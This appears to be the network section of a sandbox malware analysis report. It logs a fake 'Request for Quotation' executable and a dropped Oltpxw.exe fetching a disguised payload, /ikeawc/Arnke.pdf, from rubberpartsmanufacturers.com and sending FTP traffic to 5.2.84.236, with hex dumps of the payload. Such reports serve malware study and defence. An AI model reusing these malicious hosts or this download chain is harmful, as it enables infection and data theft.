                                              Oct 10, 2024 10:00:25.089222908 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089229107 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089247942 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089251995 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089266062 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089272976 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089288950 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089301109 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089337111 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089339972 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089360952 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089389086 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089396954 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089411020 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089443922 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089448929 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089472055 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089478970 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089498043 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089508057 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089530945 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089536905 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089569092 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089580059 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089589119 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089593887 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089608908 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089641094 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.089896917 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.089952946 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090091944 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090157032 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090226889 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090262890 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090291023 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090296030 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090322971 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090342045 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090368032 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090415001 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090445042 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090451002 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090457916 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090487003 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090570927 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090606928 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090632915 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090639114 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.090663910 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.090682030 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091079950 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091120005 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091146946 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091152906 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091173887 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091190100 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091195107 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091203928 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091239929 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091240883 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091255903 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091293097 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091404915 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091454983 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091468096 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091475964 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091506958 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091515064 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091527939 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091533899 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091558933 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091587067 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091603041 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091655016 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091667891 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091674089 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.091698885 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.091717958 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.092075109 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.092139006 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.092144012 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.092186928 CEST44349782103.191.208.122192.168.2.5
                                              Oct 10, 2024 10:00:25.092243910 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:25.099489927 CEST49782443192.168.2.5103.191.208.122
                                              Oct 10, 2024 10:00:28.043690920 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:28.048659086 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:28.048727989 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:28.684113026 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:28.684361935 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:28.689201117 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:28.912812948 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:28.913021088 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:28.918046951 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:28.951612949 CEST4976421192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:29.159882069 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.160068989 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:29.164938927 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.388379097 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.388624907 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:29.393454075 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.616877079 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.617017984 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:29.621831894 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.845711946 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:29.846740961 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:29.851646900 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.075205088 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.076057911 CEST4982664850192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.080861092 CEST64850498265.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.081000090 CEST4982664850192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.081106901 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.086028099 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.699074030 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.699366093 CEST4982664850192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.699484110 CEST4982664850192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.704176903 CEST64850498265.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.704476118 CEST64850498265.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.704520941 CEST4982664850192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.740773916 CEST4981221192.168.2.55.2.84.236
                                              Oct 10, 2024 10:00:30.928486109 CEST21498125.2.84.236192.168.2.5
                                              Oct 10, 2024 10:00:30.975172997 CEST4981221192.168.2.55.2.84.236

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 10, 2024 09:59:55.277204990 CEST6438253192.168.2.51.1.1.1
                                              Oct 10, 2024 09:59:55.911196947 CEST53643821.1.1.1192.168.2.5
                                              Oct 10, 2024 10:00:01.502161026 CEST6451353192.168.2.51.1.1.1
                                              Oct 10, 2024 10:00:01.617311001 CEST53645131.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 10, 2024 09:59:55.277204990 CEST192.168.2.51.1.1.10x9a3dStandard query (0)rubberpartsmanufacturers.comA (IP address)IN (0x0001)false
                                              Oct 10, 2024 10:00:01.502161026 CEST192.168.2.51.1.1.10x30fbStandard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 10, 2024 09:59:55.911196947 CEST1.1.1.1192.168.2.50x9a3dNo error (0)rubberpartsmanufacturers.com103.191.208.122A (IP address)IN (0x0001)false
                                              Oct 10, 2024 10:00:01.617311001 CEST1.1.1.1192.168.2.50x30fbNo error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • rubberpartsmanufacturers.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549704103.191.208.1224436160C:\Users\user\Desktop\Request for Quotation-537262227-04.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-10 07:59:57 UTC94OUTGET /ikeawc/Arnke.pdf HTTP/1.1
                                              Host: rubberpartsmanufacturers.com
                                              Connection: Keep-Alive
                                              2024-10-10 07:59:57 UTC240INHTTP/1.1 200 OK
                                              Date: Thu, 10 Oct 2024 07:59:57 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Thu, 10 Oct 2024 04:11:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 960016
                                              Content-Type: application/pdf
                                              2024-10-10 07:59:57 UTC7952INData Raw: 47 be bd c9 32 ea 02 dd 4e 83 82 30 38 b8 6c 60 b1 4c c7 f0 6b c3 0c 58 18 5d 53 98 20 c8 cb 64 c1 75 97 e4 a3 70 a9 c4 89 4b b6 25 e4 c2 35 35 02 9d d4 34 ff 61 d0 bf 69 f5 0d 3e ee 13 48 e0 6e 34 d3 0c ef 45 6d 88 3a 91 78 23 fb db 87 83 94 21 9f 85 34 dc ec 6a 96 4a 7d d4 50 04 d0 e4 8f 9d be bc f2 2f 36 0b aa 27 fc d8 fa e0 8f 9a f7 0a c2 57 4d 70 5a c8 d7 0e 56 43 67 12 c4 59 34 69 86 b9 6d 85 4a f3 fb a9 f6 4a f8 12 4c 68 e2 38 fc e8 5e ae 80 97 ca 31 53 44 b8 fb d1 a1 25 1c f9 8b a4 bf eb 34 b5 7f 1d cb ad 9d b7 d6 25 2f 75 a6 e3 7f 71 c0 2f 26 b5 b6 a5 09 e0 f2 6f 65 a6 5b 0f 0f d9 9c 1d df a4 fd 7b 29 62 8d 80 24 39 46 a5 ac 5c 8e 4b c8 4f 9c db c5 a4 2f 90 f5 b9 52 80 2f 17 29 bb 1c 2f 26 3a af f5 c0 08 01 e5 8d 2c fd a1 d3 cb cc 0c b3 c4 5b ec
                                              Data Ascii: G2N08l`LkX]S dupK%554ai>Hn4Em:x#!4jJ}P/6'WMpZVCgY4imJJLh8^1SD%4%/uq/&oe[{)b$9F\KO/R/)/&:,[
                                              2024-10-10 07:59:57 UTC8000INData Raw: a5 5c 97 d2 70 76 91 5d 27 dd 5c 6e fa 1c ea 03 30 4e 98 53 4e 95 de ba 5b 18 36 af 0c dd 1c b6 a0 6d 2a 8f 52 60 8f 40 c7 ee 19 67 7e dd 1a 00 9d f2 65 01 57 ab 96 f9 d7 e3 92 70 a6 1e 8e 35 96 9a 2b e0 83 37 e3 6e 68 b0 7c 3a c3 d3 25 8c 12 c8 01 d1 2a 2e 12 50 40 6b ca 4d 58 e2 85 9a 4e ec 4d 6b 71 ee fd d2 76 f9 88 24 c7 ee 2e 7b e2 23 ba 8d 33 2a da 60 7a 3f 1a 9c 1b 93 a5 a3 26 a8 0c 15 1f 72 1b c2 40 b3 64 d7 c2 67 eb 84 69 29 c0 73 b7 3a 78 11 99 31 92 32 1a 3d c0 57 4e e2 7b 02 e3 48 72 41 76 b6 19 00 90 9d a3 85 41 c6 d4 06 a4 1d 25 65 96 a3 c8 41 aa ff e9 d9 36 cc a0 7d 67 ad c8 d6 16 4e 6e da 39 53 01 6d 88 56 f6 85 08 2d 8d 26 aa 8d 75 52 bf 4b 7f 4f 4a ff 90 d0 71 a8 7b db 0a ba a3 65 27 61 24 5e 44 5f 7d 41 c0 c5 5f 73 f9 30 19 02 72 5c fe
                                              Data Ascii: \pv]'\n0NSN[6m*R`@g~eWp5+7nh|:%*.P@kMXNMkqv$.{#3*`z?&r@dgi)s:x12=WN{HrAvA%eA6}gNn9SmV-&uRKOJq{e'a$^D_}A_s0r\
                                              2024-10-10 07:59:57 UTC8000INData Raw: cb 47 80 d1 d5 74 a5 ce 9a ce 9e 5b 71 2e e0 59 a2 35 60 54 b6 a7 13 ac a2 fa f2 2d 77 ac 0e 44 d6 c2 4b 32 ae 11 33 71 2f e1 db 8a 99 34 1a ad 8c 70 cf dd a9 a6 c6 a9 16 cb 9d dc 27 7b 5f 4a ff 7d 2e f2 ff 98 a1 2b e8 a9 fe 39 53 2e 65 f4 ec 21 57 95 37 c6 91 c3 13 45 36 dd 57 20 f4 5e 49 fa 23 3b 5b d9 50 48 6c 3e 26 d5 cf 4b bc 1f 92 bf 61 aa 03 6c 3d ac 91 f2 f1 fd 89 ed e0 71 14 72 56 f0 da 52 70 e6 76 95 9d b2 02 e7 50 29 1d aa e4 a6 d1 3e db de 51 44 01 06 ed de 4a e8 59 7c ee 35 6e 95 a9 6b 26 3a 3a 40 e3 80 01 7a fb a6 66 62 34 99 7f 60 a9 b1 d3 82 37 e4 df 38 81 6a 1b c8 57 51 77 39 c7 83 e4 62 87 b4 9a c0 84 b6 87 21 1f 6d 64 d0 b2 c4 bd 4b e1 6c 32 35 63 d0 61 e6 a9 fb c4 13 c8 1a 57 7c ab c7 01 5d ff d8 84 a9 17 16 82 e6 c9 83 18 ef 4b f5 01
                                              Data Ascii: Gt[q.Y5`T-wDK23q/4p'{_J}.+9S.e!W7E6W ^I#;[PHl>&Kal=qrVRpvP)>QDJY|5nk&::@zfb4`78jWQw9b!mdKl25caW|]K
                                              2024-10-10 07:59:57 UTC8000INData Raw: 53 f3 c6 d1 7e 41 a4 94 b3 98 ff cb 9b 5c 16 9f 15 a1 b6 41 90 ed 14 02 11 ed 0d 1a 72 83 7b 57 48 87 02 48 9b 06 37 37 27 2c df f5 4c bc 08 2a 54 25 d7 c3 0e cc 10 b0 ef 97 95 dc 50 7e 68 95 ce 09 91 f1 9c c2 cc a3 bc 86 3f 68 9f 44 66 1e 77 0f b2 c5 f1 3f f3 13 ae 45 1c a4 e4 5d a9 4f 2f c7 94 34 b4 51 50 87 44 5e 41 0a 8f 40 51 62 28 cd de 6f 45 48 e8 03 e6 80 c3 bc f0 d1 38 00 b0 f9 cd 28 3e 45 81 af fb 70 02 dd 37 2f dd 94 8a b7 95 0a 58 8e f9 a3 23 91 e0 3e f5 3d 4e 8f 6f c5 2c d6 28 31 93 19 3b 01 72 7d 0c 38 af 52 d2 b8 e8 96 7b a8 d0 f1 b8 54 5a bf b7 28 d5 41 df 6b de 89 67 f4 4a 82 34 af 34 14 77 2e 1b 21 14 e5 7b f4 09 c9 16 7a ab 74 b7 e2 89 a6 c0 64 ae 36 0b 01 0c 1f 67 fd e6 37 dc b2 5d 9e 56 21 f1 e2 75 e4 8e fb 8b 4d 7b ef 5c ef 0c e9 86
                                              Data Ascii: S~A\Ar{WHH77',L*T%P~h?hDfw?E]O/4QPD^A@Qb(oEH8(>Ep7/X#>=No,(1;r}8R{TZ(AkgJ44w.!{ztd6g7]V!uM{\
                                              2024-10-10 07:59:57 UTC8000INData Raw: e1 26 77 ee f9 43 bd ee 3d c1 b6 c4 1e fe 0b 3d 39 0d a9 f4 7c e0 f6 e3 94 fb 8a 1f 3e 49 33 7f 47 93 5f 6f 0c 72 6d 1d d7 f7 38 c0 6c 1c 4d 56 a4 90 54 38 2e b3 d8 7f 84 30 6c 8f a9 11 2e ce 78 19 84 9e e4 f8 0b c5 75 7b 91 59 fe 7f be bf a0 8a b6 35 97 20 5e 61 1a e4 72 56 c4 d7 61 cb 4e c3 27 12 fc a8 26 b1 19 b3 aa 5c 5c 5e b4 e4 ad c7 2c 7a ff 47 04 de 88 5d cc 04 d5 11 c9 99 49 ca 1b 1e 4e d6 34 b6 81 1c ca 34 cc 8c 04 c1 16 90 be 2d 43 fb b3 22 fa 67 69 92 cc 86 98 11 17 3c 13 d0 54 c2 29 71 b4 cb 1b ea c9 46 b8 4e 33 d5 5f 6d 87 8b ca 81 6a 0b 9b fb 15 8c 5d 5c eb b7 45 13 e8 a6 d2 7b 5d d8 7b 85 72 f7 35 99 01 31 a1 65 92 5b b0 91 da 4c 2c 7f d8 a2 09 05 8c 8a 88 4d 07 01 7f 97 25 2d d6 f2 e6 2a 29 97 1c 55 77 66 c6 10 fb 08 5a d0 08 fa 30 57 d7
                                              Data Ascii: &wC==9|>I3G_orm8lMVT8.0l.xu{Y5 ^arVaN'&\\^,zG]IN44-C"gi<T)qFN3_mj]\E{]{r51e[L,M%-*)UwfZ0W
                                              2024-10-10 07:59:58 UTC8000INData Raw: 15 0c 6f 02 7c 61 9f 84 94 6d 40 47 c9 77 85 e1 fb b0 3c b2 f2 7e a1 85 05 d2 3e f5 b2 a0 88 14 25 66 aa cc 33 1a ab 53 79 a9 ad 80 a9 16 2b 17 03 0f 9f 2a ba aa 03 96 b8 51 7b 68 4a ec 8f d2 fa d9 7e cd 16 4c a5 60 0b 11 62 75 35 2e 45 5e 99 30 87 6a d0 63 95 4b 11 05 0b 8b 3f 41 22 7c 6f 7f 73 38 59 ad 78 09 ee 0e 07 b2 82 bc 60 74 64 28 be 0b cc bb af 9f d5 eb 24 5d 20 4c 40 b6 88 1b 92 2c c1 ba 90 4b 7c 7d 05 f3 03 1b d4 33 26 0c d1 0e 20 1f 74 02 0b fe 48 a8 39 d9 40 f1 03 d8 b6 04 92 e9 4c 69 70 28 02 2d 54 8e db ad 3c ba 7d bb c7 84 78 8c 19 a5 89 19 15 49 f3 fc 9b 61 88 0b 88 fb e3 87 dd c3 b8 d8 b5 05 de 83 5d d0 e4 fb 21 c6 4f 16 14 a2 55 0b 5c 3b b6 37 04 2e a7 1d 34 3c 1e 61 55 47 f2 37 8c 2d 62 0a 41 59 fd 0f 16 37 ec d6 2e 4e 89 77 3b 1f 40
                                              Data Ascii: o|am@Gw<~>%f3Sy+*Q{hJ~L`bu5.E^0jcK?A"|os8Yx`td($] L@,K|}3& tH9@Lip(-T<}xIa]!OU\;7.4<aUG7-bAY7.Nw;@
                                              2024-10-10 07:59:58 UTC8000INData Raw: 65 27 13 61 45 aa 90 5e 11 68 16 b0 c6 dc db 95 82 68 6f 35 ba 28 11 7d 81 c9 fc 0f b9 c2 8b 94 79 97 80 0e 67 62 7d 67 a6 c4 c4 ff a0 64 28 45 e2 04 9a 9e 06 74 70 d3 5c 64 ee 9a 8d 08 c0 43 a0 2e c6 47 4e c3 42 60 d9 fc f7 85 9d f6 c6 e3 79 87 bc 2d 58 42 7c df 0a 9a 64 d7 47 bf 71 ee f4 84 64 74 99 02 0e 42 4c df 3a 50 5a 02 b9 16 1f e4 cc 23 88 6a f2 ad 6f 62 56 6a fc 72 8b 4a bd 77 69 06 db 52 4b 12 57 46 e6 ec 51 e1 66 e5 be 1d 2c 26 ae d8 f8 52 b9 68 3d bb 62 a6 10 aa cf ee 74 c5 87 68 09 60 96 6f 01 33 bb fa 8a 7c bb 8e d0 5c 64 fc 65 ef dc 0e 7c 8f cd c0 15 0a ea e3 07 41 12 b8 b4 98 8a 66 7a 7a b5 10 f5 0e 49 0e 44 37 ae 45 b3 4d e2 70 7a f9 b1 1d 83 fb 2b 4c eb d9 61 f8 07 2c 3f 08 b1 11 28 52 50 34 58 02 96 60 f9 5b f6 01 36 72 82 da 8c e7 4d
                                              Data Ascii: e'aE^hho5(}ygb}gd(Etp\dC.GNB`y-XB|dGqdtBL:PZ#jobVjrJwiRKWFQf,&Rh=bth`o3|\de|AfzzID7EMpz+La,?(RP4X`[6rM
                                              2024-10-10 07:59:58 UTC8000INData Raw: ce a3 d3 2f 00 2b d6 03 90 a0 78 43 0d ec fd 4d a4 90 4e 5e a4 72 d4 0b 8d 13 d4 d6 70 7c 81 e4 1b 59 25 db 8e 5d c4 a6 4b c3 35 18 d6 98 a8 95 d3 ed 62 41 62 8b 44 0c 6e 1a b7 92 1c 54 7f 49 59 f6 79 48 af f0 ec 11 60 48 6f 92 ce 3b ec e4 05 af 4b bc e8 62 e6 f9 2e 0e e8 a4 24 27 ec 2c f4 06 33 6c 22 73 a6 3d bf 2c 9a cc 45 df 2a 3c aa c3 32 57 dc ce 9c a6 57 ba a7 a8 fd 50 2d fd e6 6d fc c8 6d d6 52 b3 19 db 6f f5 f9 9e 44 0b 42 c3 37 f8 c4 29 64 de c8 7d 5c a5 19 e6 e5 bf 47 67 23 cb e9 7c 70 44 4b 6c b3 aa 13 82 80 f5 35 ee f2 59 8d fe a4 b5 49 79 3a 3f 89 6c 37 24 a3 93 08 d8 d1 43 0b 94 eb 96 f9 43 55 0d 42 43 be 27 70 47 8d 63 b3 f1 f1 ac df 48 a3 30 8a 85 53 4c 28 01 13 fc 2a ce 58 0e c4 6f 98 3a 66 cf 80 80 99 38 fa 6a 0e 60 2f 4f 58 0e b5 6f 41
                                              Data Ascii: /+xCMN^rp|Y%]K5bAbDnTIYyH`Ho;Kb.$',3l"s=,E*<2WWP-mmRoDB7)d}\Gg#|pDKl5YIy:?l7$CCUBC'pGcH0SL(*Xo:f8j`/OXoA
                                              2024-10-10 07:59:58 UTC8000INData Raw: 3b 40 8d 58 9c 7c 63 5c f1 fd b0 ab 40 04 97 3a 5e 74 3b 40 92 1a 12 6f 74 e7 ee 50 5b 2c 1a fb 36 09 1a 37 43 f8 22 21 ff b7 95 f7 1a b8 68 65 13 eb af c3 6a d2 ed 6a 65 df b5 53 23 82 a3 99 0c 47 cd c4 65 8a ea ae 7a 0f ff 4b 62 6d c6 18 ef 12 14 52 1c 5a 8e f3 07 4f f7 a8 6b ac da 61 ab f0 04 97 70 7e 0d de 37 72 33 29 fb 19 8f df 90 db 06 d2 0f 8e 7d 6b e7 7a 5e 50 62 da b9 81 86 c7 14 89 e5 9a 99 d4 12 35 89 f7 fa f4 46 78 53 d4 61 85 75 90 3e cf fb 84 56 f3 c9 69 52 9e 32 11 1b 27 7f df 6a 07 2c aa 5b ff bb f2 5e 8c 24 cd 37 06 e8 14 5a 78 eb d5 18 f6 20 2f 76 d9 a8 9d 66 78 25 f4 f7 24 0a fa d7 e2 92 81 3f a1 7d e3 84 cd 19 20 52 a8 ce 1e 3b fa 5e ff a6 09 b2 47 c3 4c e6 83 a6 01 fb 16 46 41 53 55 8b 29 ea 24 b3 5a 65 f3 6d df aa e0 9d 94 03 83 4d
                                              Data Ascii: ;@X|c\@:^t;@otP[,67C"!hejjeS#GezKbmRZOkap~7r3)}kz^Pb5FxSau>ViR2'j,[^$7Zx /vfx%$?} R;^GLFASU)$ZemM
                                              2024-10-10 07:59:58 UTC8000INData Raw: ea c3 a0 f9 7e fa b6 40 98 d8 e0 96 96 72 e3 fb 3f b7 e0 7e 5e d5 ba 90 2f c5 f3 3b a0 94 e1 69 29 54 bf 6f f9 58 1b 48 c7 cf 9d 30 a7 46 d8 72 2f 32 16 be 5a eb f2 b5 ef d9 a0 2b 42 f5 6d 9f 72 47 dd f3 8e 81 de 69 54 fb 61 99 66 2e be 5c 97 31 06 c7 df 08 90 f6 5a 8e 9c a3 2e a3 b8 c4 0e 60 5f aa 82 b9 6c ab 19 3a ca b0 37 a6 20 4a 26 6d 8f 57 96 6f 6c 5f 98 cf 59 25 aa c2 83 41 75 1a aa 04 0d d2 33 44 87 ac 55 3d 88 35 a9 68 17 69 16 52 b3 f0 1e a8 0d 99 fc 2a 78 84 61 1f ed 21 4e 8c 92 6d ef b9 4b 7a 5f ca 28 7b ab c1 76 8d 25 a7 41 e2 e8 60 f9 4c aa 20 08 d8 67 ab 42 b1 84 09 29 aa a6 d2 12 98 ad 22 3c ee c5 55 0e e3 ff 4c 70 60 94 e6 d8 80 74 d7 26 8c 75 15 56 fb 87 09 11 43 fc 27 9e 54 5d e8 43 72 29 2c 16 ce ec ee c5 8e 75 f3 0b 33 7b 34 45 b4 f6
                                              Data Ascii: ~@r?~^/;i)ToXH0Fr/2Z+BmrGiTaf.\1Z.`_l:7 J&mWol_Y%Au3DU=5hiR*xa!NmKz_({v%A`L gB)"<ULp`t&uVC'T]Cr),u3{4E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549728103.191.208.1224432516C:\Users\user\AppData\Roaming\Oltpxw.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-10 08:00:13 UTC94OUTGET /ikeawc/Arnke.pdf HTTP/1.1
                                              Host: rubberpartsmanufacturers.com
                                              Connection: Keep-Alive
                                              2024-10-10 08:00:13 UTC240INHTTP/1.1 200 OK
                                              Date: Thu, 10 Oct 2024 08:00:13 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Thu, 10 Oct 2024 04:11:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 960016
                                              Content-Type: application/pdf
                                              2024-10-10 08:00:13 UTC7952INData Raw: 47 be bd c9 32 ea 02 dd 4e 83 82 30 38 b8 6c 60 b1 4c c7 f0 6b c3 0c 58 18 5d 53 98 20 c8 cb 64 c1 75 97 e4 a3 70 a9 c4 89 4b b6 25 e4 c2 35 35 02 9d d4 34 ff 61 d0 bf 69 f5 0d 3e ee 13 48 e0 6e 34 d3 0c ef 45 6d 88 3a 91 78 23 fb db 87 83 94 21 9f 85 34 dc ec 6a 96 4a 7d d4 50 04 d0 e4 8f 9d be bc f2 2f 36 0b aa 27 fc d8 fa e0 8f 9a f7 0a c2 57 4d 70 5a c8 d7 0e 56 43 67 12 c4 59 34 69 86 b9 6d 85 4a f3 fb a9 f6 4a f8 12 4c 68 e2 38 fc e8 5e ae 80 97 ca 31 53 44 b8 fb d1 a1 25 1c f9 8b a4 bf eb 34 b5 7f 1d cb ad 9d b7 d6 25 2f 75 a6 e3 7f 71 c0 2f 26 b5 b6 a5 09 e0 f2 6f 65 a6 5b 0f 0f d9 9c 1d df a4 fd 7b 29 62 8d 80 24 39 46 a5 ac 5c 8e 4b c8 4f 9c db c5 a4 2f 90 f5 b9 52 80 2f 17 29 bb 1c 2f 26 3a af f5 c0 08 01 e5 8d 2c fd a1 d3 cb cc 0c b3 c4 5b ec
